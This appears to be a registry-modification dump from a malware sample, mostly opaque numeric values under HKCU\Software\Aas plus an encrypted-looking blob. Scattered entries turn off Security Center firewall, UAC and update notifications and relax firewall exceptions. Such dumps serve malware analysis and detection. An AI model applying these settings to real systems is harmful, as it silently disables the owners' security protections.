"a3_19" = "152901914"
"a3_14" = "83367783"
"a3_15" = "124488582"
"a3_16" = "131411001"
"a3_17" = "104906840"
"a3_10" = "88506851"
"a3_11" = "95435266"
"a3_12" = "69459621"
"a3_13" = "76378820"
"a3_240" = "1737322713"
"a4_886" = "2056873910"
"a3_793" = "1406704208"
"a3_809" = "1488018592"
"a3_798" = "1442679927"
"a3_799" = "1416568982"
"a3_248" = "1761236945"
"a2_172" = "1233088213"
"a4_797" = "1418822141"
"a4_796" = "1411653020"
"a4_795" = "1404483899"
"a4_794" = "1397314778"
"a4_793" = "1390145657"
"a4_792" = "1382976536"
"a4_791" = "1375807415"
"a4_790" = "1368638294"
"a1_839" = "2909027320"
"a1_838" = "1214041042"
"a4_799" = "1433160383"
"a4_798" = "1425991262"
"a4_663" = "458159927"
"a4_662" = "450990806"
"a4_661" = "443821685"
"a4_660" = "436652564"
"a4_667" = "486836411"
"a4_666" = "479667290"
"a4_665" = "472498169"
"a4_664" = "465329048"
"a1_907" = "3077659490"
"a1_906" = "3546965378"
"a4_669" = "501174653"
"a4_668" = "494005532"
"a1_903" = "3110118893"
"a1_902" = "2111314808"
"a1_901" = "2410049084"
"a1_900" = "2794293840"
"a3_857" = "1865835152"
"a3_856" = "1824837233"
"a3_855" = "1817794014"
"a3_854" = "1844425151"
"a3_853" = "1836850460"
"a3_852" = "1829861629"
"a3_851" = "1789379674"
"a3_850" = "1781801019"
"a1_635" = "4060128545"
"a4_949" = "2508528533"
"a3_859" = "1846328146"
"a3_858" = "1872824115"
"a1_734" = "3611434455"
"a2_644" = "321951811"
"a4_976" = "2702094800"
"a4_454" = "3254780934"
"a1_524" = "3029277202"
"a4_407" = "2917832247"
"a4_406" = "2910663126"
"a4_405" = "2903494005"
"a4_404" = "2896324884"
"a4_403" = "2889155763"
"a4_402" = "2881986642"
"a4_401" = "2874817521"
"a4_400" = "2867648400"
"a1_825" = "390801986"
"a1_879" = "3843954609"
"a3_640" = "276404393"
"a4_409" = "2932170489"
"a4_408" = "2925001368"
"a3_641" = "283851976"
"a3_646" = "352855791"
"a3_647" = "360438542"
"a4_789" = "1361469173"
"a1_129" = "499975063"
"a1_128" = "4002356052"
"a1_125" = "2689594227"
"a1_124" = "2424147277"
"a1_127" = "1830354903"
"a1_126" = "2373065"
"a1_121" = "2717593740"
"a1_120" = "3874491140"
"a1_123" = "623366991"
"a1_122" = "217618551"
"a4_331" = "2372979051"
"a4_330" = "2365809930"
"a4_333" = "2387317293"
"a4_332" = "2380148172"
"a4_335" = "2401655535"
"a4_334" = "2394486414"
"a4_337" = "2415993777"
"a4_336" = "2408824656"
"a4_339" = "2430332019"
"a4_338" = "2423162898"
"a1_833" = "2045653207"
"a4_539" = "3864156219"
"a4_538" = "3856987098"
"a4_249" = "1785111129"
"a4_248" = "1777942008"
"a1_832" = "3386641006"
"a4_245" = "1756434645"
"a4_244" = "1749265524"
"a4_247" = "1770772887"
"a4_246" = "1763603766"
"a4_241" = "1727758161"
"a4_240" = "1720589040"
"a4_243" = "1742096403"
"a4_242" = "1734927282"
"a1_830" = "3006818215"
"a1_837" = "2046415996"
"a1_836" = "1471223928"
"a1_835" = "506371775"
"a1_754" = "1151686891"
"a4_993" = "2823969857"
"a1_834" = "4132990846"
"a1_634" = "104415599"
"a2_463" = "3319304682"
"a2_462" = "3312138459"
"a2_461" = "3304971387"
"a2_460" = "3297788691"
"a2_467" = "3347972441"
"a2_466" = "3340803007"
"a2_465" = "3333650204"
"a2_464" = "3326474225"
"a2_469" = "3362322526"
"a2_468" = "3355156313"
"a1_934" = "3591785402"
"a4_802" = "1454667746"
"a4_872" = "1956506216"
"a2_869" = "1934990952"
"a2_868" = "1927838246"
"a2_867" = "1920659249"
"a2_866" = "1913489605"
"a2_865" = "1906323994"
"a2_864" = "1899158845"
"a2_863" = "1891988840"
"a1_791" = "1504348683"
"a2_861" = "1877640835"
"a2_860" = "1870473570"
"a2_597" = "4279960050"
"a2_596" = "4272794059"
"a2_595" = "4265628117"
"a2_594" = "4258463477"
"a1_338" = "1168606377"
"a1_339" = "2643564842"
"a2_591" = "4236945452"
"a2_590" = "4229778834"
"a1_334" = "578861251"
"a1_335" = "184448182"
"a1_336" = "3760924533"
"a1_337" = "3290197519"
"a1_330" = "703462671"
"a1_331" = "54800311"
"a1_332" = "1685649520"
"a1_333" = "1711265904"
"a2_607" = "56695136"
"a2_606" = "49512641"
"a3_30" = "231909751"
"a2_604" = "35189014"
"a1_64" = "4024610170"
"a2_602" = "20845952"
"a2_601" = "13677060"
"a2_600" = "6512503"
"a4_875" = "1978013579"
"a2_609" = "71031869"
"a2_608" = "63864591"
"a2_265" = "1899819304"
"a2_264" = "1892653656"
"a2_267" = "1914154185"
"a2_266" = "1906989982"
"a2_261" = "1871138504"
"a2_260" = "1863969571"
"a2_263" = "1885472730"
"a2_262" = "1878304043"
"a2_919" = "2293452784"
"a1_908" = "3453607025"
"a2_269" = "1928488830"
"a2_268" = "1921321172"
"a1_905" = "655917524"
"a2_884" = "2042527993"
"a1_482" = "4226090616"
"a1_483" = "1810191455"
"a2_289" = "2071873169"
"a2_288" = "2064698567"
"a1_486" = "2245001074"
"a1_487" = "1985463891"
"a1_484" = "3964511762"
"a1_485" = "582550657"
"a2_283" = "2028859201"
"a2_282" = "2021690489"
"a2_281" = "2014525714"
"a2_280" = "2007356622"
"a2_287" = "2057542948"
"a2_286" = "2050374883"
"a2_285" = "2043191725"
"a2_284" = "2036025304"
"a2_739" = "1003016628"
"a2_738" = "995836605"
"a3_522" = "3725445091"
"a2_733" = "960003892"
"a2_732" = "952834530"
"a2_731" = "945666578"
"a2_730" = "938484639"
"a2_737" = "988671171"
"a2_736" = "981500889"
"a2_735" = "974334303"
"a2_734" = "967170378"
"a4_446" = "3197427966"
"a1_637" = "4289777240"
"a3_912" = "2226582457"
"a1_240" = "1888556951"
"a1_241" = "472744687"
"a1_242" = "3058936332"
"a1_243" = "2628265565"
"a1_244" = "3852462282"
"a1_245" = "362573412"
"a1_246" = "1201760128"
"a1_247" = "1652107045"
"a1_248" = "3990502546"
"a1_249" = "2587302919"
"a3_738" = "978859403"
"a3_739" = "986426922"
"a4_445" = "3190258845"
"a2_131" = "939147894"
"a2_130" = "931980891"
"a2_133" = "953496019"
"a2_132" = "946330291"
"a2_135" = "967833904"
"a2_134" = "960664695"
"a2_137" = "982166193"
"a2_136" = "974998967"
"a2_139" = "996514227"
"a2_138" = "989347454"
"a4_889" = "2078381273"
"a4_888" = "2071212152"
"a2_79" = "566354957"
"a2_78" = "559189617"
"a3_916" = "2254979389"
"a3_288" = "2048100105"
"a3_289" = "2055027624"
"a3_184" = "1336102801"
"a3_917" = "2262558044"
"a3_282" = "2038692083"
"a3_283" = "2045680914"
"a3_280" = "1990631473"
"a3_281" = "2031109200"
"a3_286" = "2067091063"
"a3_287" = "2074141334"
"a3_284" = "2019045813"
"a3_285" = "2026624468"
"a3_606" = "66123703"
"a3_607" = "40004566"
"a3_604" = "52150005"
"a3_605" = "59069204"
"a3_602" = "4023859"
"a3_603" = "11016786"
"a3_600" = "23079281"
"a3_601" = "30657936"
"a4_700" = "723417404"
"a3_608" = "46992457"
"a3_609" = "87597288"
"a1_796" = "226709699"
"a1_583" = "2241026978"
"a1_794" = "1221264522"
"a1_795" = "629567253"
"a1_792" = "3315245633"
"a1_793" = "116422688"
"a1_790" = "930008649"
"a1_582" = "2778799272"
"a3_635" = "240424626"
"a3_911" = "2219532038"
"a1_581" = "4017401496"
"a1_798" = "333538965"
"a1_799" = "3087451236"
"a1_580" = "3100129418"
"a3_198" = "1436076335"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKCU\Software\Aas]
"a3_196" = "1388556397"
"a3_197" = "1429034124"
"a3_194" = "1407548331"
"a3_195" = "1380982730"
"a3_192" = "1393042153"
"a3_193" = "1400620808"
"a3_190" = "1345525207"
"a3_191" = "1352568438"
"a2_981" = "2737942844"
"a1_585" = "2975035927"
"a3_468" = "3338201981"
"a3_469" = "3379269532"
"a3_466" = "3324236475"
"a3_467" = "3331159770"
"a3_464" = "3343287801"
"a3_465" = "3350216216"
"a3_462" = "3295169831"
"a3_463" = "3302744390"
"a3_460" = "3314758757"
"a3_461" = "3321800836"
"a1_468" = "3921200395"
"a1_469" = "906977248"
"a3_518" = "3696916079"
"a3_519" = "3703958158"
"a1_460" = "1217202694"
"a1_461" = "831879874"
"a1_462" = "3238851506"
"a1_463" = "3552727515"
"a1_464" = "1572181995"
"a1_465" = "1321475471"
"a1_466" = "356288489"
"a1_467" = "4056281565"
"a3_29" = "224867540"
"a3_28" = "183865525"
"a1_668" = "1172656216"
"a1_669" = "1298915360"
"a3_21" = "167399900"
"a3_20" = "159956413"
"a3_23" = "148336286"
"a3_22" = "140888703"
"a3_25" = "195929936"
"a3_24" = "188875569"
"a3_27" = "176880658"
"a3_26" = "169827315"
"a2_830" = "1655396276"
"a3_994" = "2847713931"
"a3_992" = "2800197065"
"a3_499" = "3560555322"
"a3_990" = "2785625399"
"a2_831" = "1662569593"
"a3_498" = "3587059355"
"a2_832" = "1669736229"
"a3_497" = "3579611768"
"a2_833" = "1676903906"
"a3_496" = "3539014105"
"a2_834" = "1684085505"
"a3_495" = "3532029350"
"a2_835" = "1691252196"
"a4_955" = "2551543259"
"a3_494" = "3524581639"
"a2_836" = "1698426199"
"a3_493" = "3551077604"
"a2_837" = "1705586549"
"a3_492" = "3544154181"
"a3_491" = "3503090722"
"a3_527" = "3761424774"
"a3_490" = "3496037251"
"a3_775" = "1244236686"
"a4_915" = "2264778419"
"a3_868" = "1944793805"
"a2_529" = "3792467854"
"a4_914" = "2257609298"
"a3_862" = "1901368503"
"a3_863" = "1908803798"
"a3_860" = "1853775861"
"a3_861" = "1860825108"
"a3_866" = "1930361355"
"a3_867" = "1937350314"
"a3_864" = "1882303817"
"a3_865" = "1889747432"
"a1_806" = "3027555282"
"a1_807" = "1478153728"
"a1_804" = "2472213786"
"a1_805" = "4237724971"
"a1_802" = "2257277118"
"a1_803" = "3758330382"
"a1_800" = "2873727094"
"a1_801" = "198824186"
"a1_808" = "2096865174"
"a1_809" = "1347442431"
"a4_656" = "407976080"
"a4_657" = "415145201"
"a4_654" = "393637838"
"a4_655" = "400806959"
"a4_652" = "379299596"
"a4_653" = "386468717"
"a4_650" = "364961354"
"a4_651" = "372130475"
"a1_938" = "592675028"
"a1_939" = "344183708"
"a4_658" = "422314322"
"a4_659" = "429483443"
"a3_773" = "1263760076"
"a4_849" = "1791616433"
"a4_919" = "2293454903"
"a4_918" = "2286285782"
"a2_656" = "407971689"
"a1_875" = "2456747069"
"a4_925" = "2336469629"
"a3_762" = "1151312531"
"a1_684" = "309846654"
"a4_989" = "2795293373"
"a4_438" = "3140074998"
"a4_439" = "3147244119"
"a1_874" = "1207583382"
"a4_432" = "3097060272"
"a4_433" = "3104229393"
"a4_430" = "3082722030"
"a4_431" = "3089891151"
"a4_436" = "3125736756"
"a4_437" = "3132905877"
"a4_434" = "3111398514"
"a4_435" = "3118567635"
"a3_928" = "2374546825"
"a4_344" = "2466177624"
"a4_345" = "2473346745"
"a4_346" = "2480515866"
"a4_347" = "2487684987"
"a4_340" = "2437501140"
"a4_341" = "2444670261"
"a4_342" = "2451839382"
"a4_343" = "2459008503"
"a3_764" = "1198848853"
"a4_348" = "2494854108"
"a4_349" = "2502023229"
"a4_508" = "3641913468"
"a4_509" = "3649082589"
"a4_506" = "3627575226"
"a4_507" = "3634744347"
"a4_504" = "3613236984"
"a4_505" = "3620406105"
"a4_502" = "3598898742"
"a4_503" = "3606067863"
"a4_500" = "3584560500"
"a4_501" = "3591729621"
"a3_383" = "2729068342"
"a3_382" = "2721620631"
"a4_882" = "2028197426"
"a3_381" = "2748124788"
"a2_456" = "3269126402"
"a2_457" = "3276286863"
"a2_454" = "3254787878"
"a3_380" = "2741212629"
"a2_452" = "3240435967"
"a2_453" = "3247605727"
"a2_450" = "3226103077"
"a2_451" = "3233269939"
"a3_387" = "2757612682"
"a3_633" = "259938800"
"a2_458" = "3283455764"
"a3_386" = "2784112747"
"a3_385" = "2776670152"
"a4_881" = "2021028305"
"a3_384" = "2769681321"
"a1_735" = "3705091684"
"a2_852" = "1813120419"
"a1_730" = "2722885284"
"a2_850" = "1798791032"
"a2_851" = "1805955238"
"a2_856" = "1841803985"
"a2_857" = "1848974803"
"a2_854" = "1827456799"
"a1_731" = "3843546292"
"a3_632" = "252486993"
"a2_858" = "1856140417"
"a2_859" = "1863316156"
"a1_732" = "3160653598"
"a1_733" = "722041630"
"a1_329" = "767025692"
"a1_328" = "3820081654"
"a1_327" = "233415132"
"a1_326" = "3335234011"
"a1_325" = "3545517540"
"a1_324" = "2845262996"
"a1_323" = "238043327"
"a1_322" = "3467187549"
"a1_321" = "1035169700"
"a1_320" = "217051003"
"a2_650" = "364969319"
"a1_436" = "579767432"
"a1_736" = "644120873"
"a3_631" = "211878206"
"a1_737" = "3226083464"
"a2_652" = "379305059"
"a3_923" = "2339079058"
"a2_926" = "2343635399"
"a2_927" = "2350800629"
"a2_924" = "2329301595"
"a2_653" = "386470840"
"a4_887" = "2064043031"
"a2_923" = "2322136306"
"a2_920" = "2300618554"
"a2_921" = "2307798281"
"a2_654" = "393639538"
"a2_928" = "2357969987"
"a2_655" = "400802661"
"a3_630" = "204893343"
"a2_657" = "415139415"
"a3_922" = "2298015603"
"a1_495" = "2200345849"
"a1_494" = "899202022"
"a1_497" = "3262123616"
"a1_496" = "3674442041"
"a1_491" = "1202951605"
"a1_490" = "2351384775"
"a1_493" = "2460429581"
"a1_492" = "2282537400"
"a1_499" = "3187754856"
"a1_498" = "3299085068"
"a3_637" = "288468852"
"a2_708" = "780763386"
"a2_709" = "787978162"
"a2_706" = "766440359"
"a2_707" = "773598612"
"a2_704" = "752101869"
"a2_705" = "759264589"
"a2_702" = "737763743"
"a2_703" = "744930132"
"a2_700" = "723414587"
"a2_701" = "730580101"
"a4_885" = "2049704789"
"a2_638" = "278923359"
"a2_639" = "286104452"
"a3_808" = "1481095169"
"a2_632" = "235918343"
"a2_633" = "243077710"
"a2_630" = "221583590"
"a2_631" = "228752624"
"a2_636" = "264599755"
"a2_637" = "271771498"
"a2_634" = "250249485"
"a2_635" = "257417253"
"a1_253" = "3498831385"
"a1_252" = "1078990264"
"a1_251" = "880690242"
"a1_250" = "2022323056"
"a1_257" = "1348334927"
"a1_256" = "2371159389"
"a1_255" = "3812134850"
"a1_254" = "2678023682"
"a3_920" = "2284050097"
"a1_259" = "992568891"
"a1_258" = "3210906031"
"a3_729" = "914469392"
"a3_728" = "907418097"
"a4_884" = "2042535668"
"a2_144" = "1032350713"
"a2_145" = "1039531835"
"a2_146" = "1046686021"
"a2_147" = "1053852036"
"a2_140" = "1003683571"
"a2_141" = "1010848634"
"a2_142" = "1018007071"
"a2_143" = "1025192446"
"a1_781" = "4151709411"
"a1_780" = "3739808306"
"a2_68" = "487501849"
"a2_69" = "494670094"
"a2_148" = "1061033607"
"a2_149" = "1068200082"
"a1_787" = "2356295262"
"a4_455" = "3261950055"
"a3_299" = "2126993250"
"a3_298" = "2119545539"
"a3_295" = "2131608046"
"a3_294" = "2091003215"
"a3_297" = "2146049696"
"a3_296" = "2139060737"
"a3_291" = "2103079018"
"a3_290" = "2062081995"
"a3_293" = "2083555628"
"a3_292" = "2110067853"
"a2_987" = "2780961089"
"a1_904" = "4136123974"
"a3_634" = "266990099"
"a3_619" = "159571106"
"a3_618" = "152516611"
"a3_611" = "68549034"
"a3_610" = "95044875"
"a3_613" = "82982508"
"a3_612" = "75537869"
"a3_615" = "131026734"
"a3_614" = "123579023"
"a3_617" = "111511520"
"a3_616" = "104522561"
"a3_181" = "1280611004"
"a3_180" = "1307180573"
"a3_34" = "260325067"
"a3_182" = "1288058591"
"a3_185" = "1309597744"
"a3_33" = "253401768"
"a3_187" = "1324038386"
"a3_186" = "1316586579"
"a3_189" = "1371566516"
"a3_188" = "1364647189"
"a3_38" = "289377359"
"a3_39" = "296296686"
"a3_471" = "3359687774"
"a3_470" = "3386187839"
"a3_473" = "3407682832"
"a3_472" = "3367139569"
"a3_475" = "3422180818"
"a3_474" = "3414733235"
"a3_477" = "3403113108"
"a4_282" = "2021692122"
"a3_479" = "3450714966"
"a3_478" = "3443656503"
"a1_479" = "214635012"
"a1_478" = "535369390"
"a3_509" = "3632529140"
"a3_508" = "3624950357"
"a1_473" = "3543533826"
"a1_472" = "2164304998"
"a1_471" = "659385612"
"a1_470" = "3866699320"
"a1_477" = "3207631712"
"a1_476" = "3986024451"
"a1_475" = "3546390948"
"a1_474" = "1368939846"
"a4_533" = "3821141493"
"a1_679" = "703130473"
"a1_678" = "922969180"
"a4_532" = "3813972372"
"a1_675" = "4016316799"
"a1_674" = "3467639772"
"a1_677" = "1489410111"
"a1_676" = "1005611633"
"a1_671" = "924698625"
"a4_531" = "3806803251"
"a1_673" = "793431128"
"a1_672" = "2013822510"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"

[HKCU\Software\Aas]
"a4_530" = "3799634130"
"a4_537" = "3849817977"
"a4_536" = "3842648856"
"a3_989" = "2812256404"
"a1_868" = "846596912"
"a4_535" = "3835479735"
"a3_981" = "2721238428"
"a3_980" = "2747738493"
"a3_983" = "2769230430"
"a4_534" = "3828310614"
"a3_985" = "2783204112"
"a3_984" = "2776284913"
"a3_987" = "2764139474"
"a3_986" = "2757228467"
"a2_151" = "1082534417"
"a2_150" = "1075366125"
"a1_869" = "153123048"
"a2_271" = "1942839264"
"a3_879" = "1989722918"
"a3_878" = "1982672519"
"a1_823" = "2555115930"
"a3_874" = "1954273539"
"a3_877" = "2009303652"
"a3_876" = "2001736133"
"a3_871" = "1966337070"
"a3_870" = "1925204879"
"a3_873" = "1946690784"
"a3_872" = "1973321793"
"a2_159" = "1139887900"
"a4_758" = "1139226422"
"a2_158" = "1132719929"
"a1_925" = "799192776"
"a1_924" = "3248521378"
"a1_927" = "3272737385"
"a1_926" = "3214498144"
"a1_921" = "797725622"
"a1_920" = "2955194781"
"a3_787" = "1363737626"
"a1_922" = "3990140020"
"a3_80" = "590099577"
"a1_929" = "3912466801"
"a1_928" = "191676151"
"a4_649" = "357792233"
"a4_648" = "350623112"
"a4_641" = "300439265"
"a4_640" = "293270144"
"a4_643" = "314777507"
"a4_642" = "307608386"
"a4_645" = "329115749"
"a4_644" = "321946628"
"a4_647" = "343453991"
"a4_646" = "336284870"
"a3_786" = "1323129851"
"a1_819" = "691028123"
"a1_818" = "998693804"
"a3_785" = "1316202328"
"a3_746" = "1069934723"
"a1_811" = "808633083"
"a1_810" = "2536876996"
"a1_813" = "3261187592"
"a1_812" = "176415261"
"a1_815" = "2874111614"
"a1_814" = "3516310583"
"a1_817" = "2813111874"
"a1_816" = "220667206"
"a4_963" = "2608896227"
"a4_429" = "3075552909"
"a4_428" = "3068383788"
"a4_425" = "3046876425"
"a4_424" = "3039707304"
"a4_427" = "3061214667"
"a4_426" = "3054045546"
"a4_421" = "3018199941"
"a4_420" = "3011030820"
"a4_423" = "3032538183"
"a4_422" = "3025369062"
"a3_743" = "1014841262"
"a3_745" = "1062892640"
"a3_742" = "1007917839"
"a4_967" = "2637572711"
"a3_741" = "1033955052"
"a2_802" = "1454656329"
"a4_357" = "2559376197"
"a4_356" = "2552207076"
"a4_355" = "2545037955"
"a4_354" = "2537868834"
"a4_353" = "2530699713"
"a4_352" = "2523530592"
"a4_351" = "2516361471"
"a4_350" = "2509192350"
"a3_747" = "1043369250"
"a4_359" = "2573714439"
"a4_358" = "2566545318"
"a4_511" = "3663420831"
"a4_510" = "3656251710"
"a4_513" = "3677759073"
"a4_512" = "3670589952"
"a4_515" = "3692097315"
"a4_514" = "3684928194"
"a4_517" = "3706435557"
"a4_516" = "3699266436"
"a4_519" = "3720773799"
"a4_518" = "3713604678"
"a3_744" = "1021891521"
"a3_749" = "1091421668"
"a1_994" = "464977948"

[HKCU\Software\Aas\695404737]
"50183847" = "6CB4F357E15540EBCF387CD502BE18BB83B2095EA6EE884B0D059449A5342D68E3B2D27FB714B9250509608EC3DEB7EEA20A33E26D97C5486AA270018FFA46A16EE0AF4EE22779AE1BD1BBA23B356C014518440564740352676BB249C23112961C700B388C12E7360016EE2DAFC09E2689A619CC82C6AA0421112571C15FFB27"

[HKCU\Software\Aas]
"a2_845" = "1762935570"
"a2_844" = "1755771691"
"a2_847" = "1777273571"
"a2_846" = "1770102965"
"a2_841" = "1734268413"
"a2_840" = "1727087962"
"a2_843" = "1748603574"
"a2_842" = "1741435005"
"a3_780" = "1280228773"
"a3_533" = "3804403676"
"a2_849" = "1791622412"
"a2_848" = "1784451536"
"a1_312" = "2290445478"
"a1_313" = "4278217005"
"a1_310" = "2096060354"
"a1_311" = "3232239173"
"a1_316" = "709456274"
"a1_317" = "2730619047"
"a1_314" = "2420229575"
"a1_315" = "3594888677"
"a3_620" = "166490309"
"a1_318" = "2496015900"
"a1_319" = "2876456070"
"a4_929" = "2365146113"
"a4_982" = "2745109526"
"a2_449" = "3218942701"
"a2_448" = "3211767835"
"a3_621" = "140449124"
"a2_441" = "3161585152"
"a2_440" = "3154420594"
"a2_443" = "3175919062"
"a2_442" = "3168752793"
"a2_445" = "3190251756"
"a2_444" = "3183083804"
"a2_447" = "3204603440"
"a2_446" = "3197434944"
"a2_939" = "2436838828"
"a2_938" = "2429670714"
"a4_893" = "2107057757"
"a2_931" = "2379493300"
"a2_930" = "2372318900"
"a2_933" = "2393820402"
"a2_932" = "2386652358"
"a2_935" = "2408154408"
"a2_934" = "2400983305"
"a2_937" = "2422490759"
"a2_936" = "2415337039"
"a3_818" = "1552537563"
"a2_711" = "802286765"
"a2_710" = "795113762"
"a2_713" = "816614521"
"a2_712" = "809449601"
"a2_715" = "830948209"
"a2_714" = "823776344"
"a2_717" = "845299475"
"a2_716" = "838117078"
"a2_719" = "859632313"
"a2_718" = "852464085"
"a1_587" = "3130574844"
"a3_623" = "187965990"
"a2_629" = "214416334"
"a2_628" = "207234891"
"a2_625" = "185731789"
"a2_624" = "178566525"
"a2_627" = "200068658"
"a2_626" = "192899197"
"a2_621" = "157050919"
"a2_620" = "149881182"
"a2_623" = "171398751"
"a2_622" = "164231949"
"a1_266" = "1350728086"
"a1_267" = "1401905378"
"a1_264" = "1553260102"
"a1_265" = "3854462512"
"a1_262" = "3309523602"
"a1_263" = "2987030014"
"a1_260" = "929631485"
"a1_261" = "680354745"
"a1_268" = "2105117502"
"a1_269" = "4217194077"
"a2_157" = "1125554298"
"a2_156" = "1118384774"
"a2_155" = "1111216580"
"a2_154" = "1104051100"
"a2_153" = "1096865843"
"a2_152" = "1089714761"
"a2_99" = "709751147"
"a2_98" = "702575800"
"a2_97" = "695406973"
"a2_96" = "688227479"
"a2_95" = "681060180"
"a2_94" = "673905557"
"a2_93" = "666725917"
"a2_92" = "659556474"
"a2_91" = "652393188"
"a2_90" = "645230544"
"a3_260" = "1847236781"
"a3_261" = "1854160076"
"a3_262" = "1861734767"
"a3_263" = "1902212494"
"a3_264" = "1909255713"
"a3_265" = "1883210304"
"a3_266" = "1890133731"
"a3_267" = "1930746626"
"a3_268" = "1938194341"
"a3_269" = "1945179076"
"a1_915" = "2367242608"
"a1_847" = "3847909569"
"a3_404" = "2913010493"
"a1_844" = "2084677244"
"a3_405" = "2886510428"
"a1_845" = "824812864"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Aas]
"a2_862" = "1884806313"
"a4_983" = "2752278647"
"a1_961" = "425622941"
"a3_668" = "477267765"
"a3_669" = "484195156"
"a1_960" = "2241691803"
"a3_664" = "448737713"
"a3_665" = "489346512"
"a3_666" = "496258675"
"a3_667" = "470278802"
"a3_660" = "453353533"
"a3_661" = "460801116"
"a3_662" = "467859711"
"a3_663" = "441294110"
"a3_43" = "324843106"
"a3_42" = "284237251"
"a3_41" = "277248416"
"a3_40" = "269796609"
"a3_47" = "353765350"
"a3_46" = "313221959"
"a3_45" = "305778468"
"a3_44" = "332278405"
"a1_965" = "920052320"
"a3_49" = "368270520"
"a3_48" = "360822809"
"a1_964" = "3141184024"
"a4_99" = "709742979"
"a4_98" = "702573858"
"a3_406" = "2893962239"
"a3_407" = "2901015582"
"a3_400" = "2884615609"
"a3_401" = "2857980376"
"a3_402" = "2865023611"
"a3_403" = "2906025626"
"a4_91" = "652390011"
"a4_90" = "645220890"
"a4_93" = "666728253"
"a4_92" = "659559132"
"a4_95" = "681066495"
"a4_94" = "673897374"
"a4_97" = "695404737"
"a4_96" = "688235616"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"

[HKCU\Software\Aas]
"a1_448" = "1826617722"
"a1_449" = "2894051455"
"a1_446" = "2847338048"
"a3_408" = "2941554865"
"a1_444" = "814677728"
"a1_445" = "813870020"
"a1_442" = "3208588845"
"a1_443" = "2520195173"
"a1_440" = "1224195046"
"a3_409" = "2949002448"
"a1_680" = "1161361020"
"a1_681" = "2496774151"
"a1_682" = "2463587414"
"a1_683" = "3736371317"
"a2_561" = "4021871994"
"a1_685" = "2897339600"
"a1_686" = "1066375865"
"a1_687" = "1713224562"
"a1_688" = "2452248553"
"a1_689" = "3530401214"

"a3_834" = "1700949547"
"a3_988" = "2804681845"
"a1_767" = "1538781888"
"a1_766" = "2410730337"
"a3_318" = "2262948439"
"a3_319" = "2303950582"
"a2_599" = "4294297952"
"a3_310" = "2239031135"
"a3_311" = "2246548478"
"a3_312" = "2219916305"
"a3_313" = "2226966704"
"a3_314" = "2267968723"
"a3_315" = "2275010930"
"a3_316" = "2248445333"
"a3_317" = "2255889972"
"a3_933" = "2410528684"
"a4_928" = "2357976992"
"a3_934" = "2384417743"
"a1_760" = "696903492"
"a2_605" = "42348090"
"a3_935" = "2391471214"
"a3_476" = "3395669621"
"a1_447" = "3866139621"
"a2_603" = "28011794"
"a3_880" = "2030724953"
"a3_881" = "2037718008"
"a3_882" = "2044771355"
"a3_883" = "2018660538"
"a3_884" = "2025714909"
"a3_885" = "2066704764"
"a3_886" = "2073693599"
"a1_745" = "1872612480"
"a3_888" = "2054642257"
"a3_889" = "2061696752"
"a1_769" = "882364113"
"a1_441" = "307471700"
"a4_964" = "2616065348"
"a1_744" = "1682727637"
"a4_988" = "2788124252"
"a4_857" = "1848969401"
"a4_638" = "278931902"
"a4_639" = "286101023"
"a4_634" = "250255418"
"a4_635" = "257424539"
"a4_636" = "264593660"
"a4_637" = "271762781"
"a4_630" = "221578934"
"a4_631" = "228748055"
"a4_632" = "235917176"
"a4_633" = "243086297"
"a2_913" = "2250435237"
"a1_747" = "2808186437"
"a2_912" = "2243266195"
"a2_911" = "2236098978"
"a2_651" = "372138360"
"a2_910" = "2228929945"
"a3_794" = "1380597491"

[HKCU\Software\Aas\695404737]
"35845605" = "392"

[HKCU\Software\Aas]
"a2_917" = "2279123620"
"a4_883" = "2035366547"
"a2_916" = "2271950215"
"a4_740" = "1010182244"
"a4_741" = "1017351365"
"a4_742" = "1024520486"
"a4_743" = "1031689607"
"a4_744" = "1038858728"
"a4_745" = "1046027849"
"a4_746" = "1053196970"
"a4_747" = "1060366091"
"a4_748" = "1067535212"
"a4_749" = "1074704333"
"a1_866" = "1411065417"
"a1_867" = "247249982"
"a1_860" = "3812348768"
"a1_861" = "2360832110"
"a1_862" = "3409793117"
"a4_859" = "1863307643"
"a4_182" = "1304780022"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"

[HKCU\Software\Aas]
"a4_180" = "1290441780"
"a4_181" = "1297610901"
"a4_186" = "1333456506"
"a4_187" = "1340625627"
"a4_184" = "1319118264"
"a4_185" = "1326287385"
"a4_188" = "1347794748"
"a4_189" = "1354963869"
"a1_741" = "4184730763"
"a2_918" = "2286284166"
"a4_168" = "1204412328"
"a1_194" = "499211836"
"a1_195" = "165979735"
"a4_160" = "1147059360"
"a4_161" = "1154228481"
"a4_162" = "1161397602"
"a4_163" = "1168566723"
"a4_164" = "1175735844"
"a4_165" = "1182904965"
"a4_166" = "1190074086"
"a4_167" = "1197243207"
"a4_296" = "2122059816"
"a4_297" = "2129228937"
"a4_294" = "2107721574"
"a4_295" = "2114890695"
"a4_292" = "2093383332"
"a4_293" = "2100552453"
"a4_290" = "2079045090"
"a4_291" = "2086214211"
"a4_142" = "1018015182"
"a3_952" = "2546868881"
"a4_568" = "4072060728"
"a4_569" = "4079229849"
"a4_298" = "2136398058"
"a4_299" = "2143567179"
"a2_598" = "4287127990"
"a1_192" = "845874045"
"a1_193" = "337306603"
"a1_969" = "2253316243"
"a4_934" = "2400991718"
"a3_993" = "2840671848"
"a3_790" = "1351657855"
"a4_958" = "2573050622"
"a1_742" = "367024505"
"a4_368" = "2638236528"
"a4_369" = "2645405649"
"a4_362" = "2595221802"
"a4_363" = "2602390923"
"a4_360" = "2580883560"
"a4_361" = "2588052681"
"a4_366" = "2623898286"
"a4_367" = "2631067407"
"a4_364" = "2609560044"
"a4_365" = "2616729165"
"a1_305" = "1304522431"
"a1_304" = "2213019789"
"a1_307" = "1314788896"
"a1_306" = "3833159051"
"a1_301" = "1767093825"
"a1_300" = "1890527715"
"a1_303" = "3884254321"
"a1_302" = "2361813855"
"a3_792" = "1399711281"
"a1_309" = "307386179"
"a1_308" = "3738036461"
"a2_540" = "3871320949"
"a2_541" = "3878500204"
"a2_542" = "3885670049"
"a1_481" = "2095769884"
"a2_544" = "3900009888"
"a2_545" = "3907168250"
